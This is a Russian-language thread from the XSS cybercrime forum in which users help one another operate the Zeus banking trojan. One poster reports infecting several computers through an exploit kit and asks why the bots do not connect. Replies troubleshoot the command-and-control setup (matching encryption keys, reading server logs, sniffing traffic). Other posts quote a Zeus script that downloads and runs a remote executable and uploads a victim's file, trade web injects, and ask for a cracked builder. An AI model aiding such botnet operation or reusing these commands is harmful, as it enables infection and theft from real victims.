• XSS.stack #1 – первый литературный журнал от юзеров форума

malware Zeus trojan.

hi all.

Помогите разобраться с проблемой.?
Решил поставить сабж поновее на другой хост ..
Поставил админку на хость, при установке все ОК.
Запустил билдер все пути указал, скомпилил конфиг и билд.

билд добавил в свизку, через некоторое время связка пробила несколько компов, но ниодин бот неотстучал.
Потом поставил варю и в ней через левый впн без антивиря запустил екзе и он тоже не отстучал..

Может проблема с билдером?
 
если вообще не стучит, то проверь, что-бы ключ шифрования был одинаковый (config.php и config.txt).
если не поможет - то пробуй снифать траф и смотреть логи веб сервера
 
2Pernat1y hi
(спс что откликнулся)

С ключами шифрования уже мудрил разные комбинации вплоть до "123" в админке и в конфиге... - не помогло.. неотстучал ниодин бот.

По второму совету немного не понятно "снифать" траф... В этой области не силён.. можно поподробней?
 
По второму совету немного не понятно "снифать" траф... В этой области не силён.. можно поподробней?
запускаешь бота на виртуалке, и смотришь логи веб сервера (в апаче обычно access.log и error.log). если бот пытается зайти, но в админке его не видно, то скорее всего ошибка на стороне сервера (кривая админка, пхп не поддерживается, криво настроены права, луна не в той фазе и т.д.)

если в логах попыток подключения нету, то:
ставишь на виртуальную машину сниффер, например, wireshark. и смотришь, пытаеться-ли бот куда-то подключиться.
тут либо билд кривой, либо ты в домене/путях промахнулся.
 
Подскажите смысл команды "addsf [file_mask...] Add file masks [file_mask] for local search.". Я понимаю что она добавляет маску для поиска. Но вопрос в том: для какого поиска ? google предательски молчит :bang:
 
Заметил такой баг в скриптах:
к примеру есть скрипт
Код:
rexec "http://site.ru/site/run.exe"  /par1 /par2
getfile c:\test.bin
По логике сначала должен скачаться и выполнится run.exe с параметрами /par1 /par2, а затем на сервер загрузится файл c:\test.bin. Вместо этого мы получаем запуск run.exe с параметрами "/par1 /par2 ◙◙ getfile c:\test.bin". :crazy:
 
Уважаемые посетители портала, прошу при просьбе инжектов соблюдать заявленные требования
1) Пишем в ПМ.
2) Минимум 25 постов на форуме
3) Респекты +3 и выше.
, они не так уж и высоки, а набрать 25 полезных постов и при этом заслужить репу +3 или выше не так уж и сложно, тем более что при том уровне знаний что нужен для работы с зевсом я думаю должна быть репа и знания, а отдавать барыгам инжекты не хочу, дабы потом ими эти люди барыжить начнёт.... Так что просьбе, без указаны требований к профилю не стучать за получением инжектов. Спасибо.
 
Если кому зевс интересен и кто еще не видел, советую прочитать всю страничку
http://forum.zloy.bz/showthread.php?t=77614&page=18
если у кого есть Версия 1.4.0.0, xx.12.2009 киньте в личку, попробую отвязать от привязки к компу
если получится, выложу здесь под большим хайдом, чтобы юзали ТОЛЬКО МЕМБЕРЫ DL
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх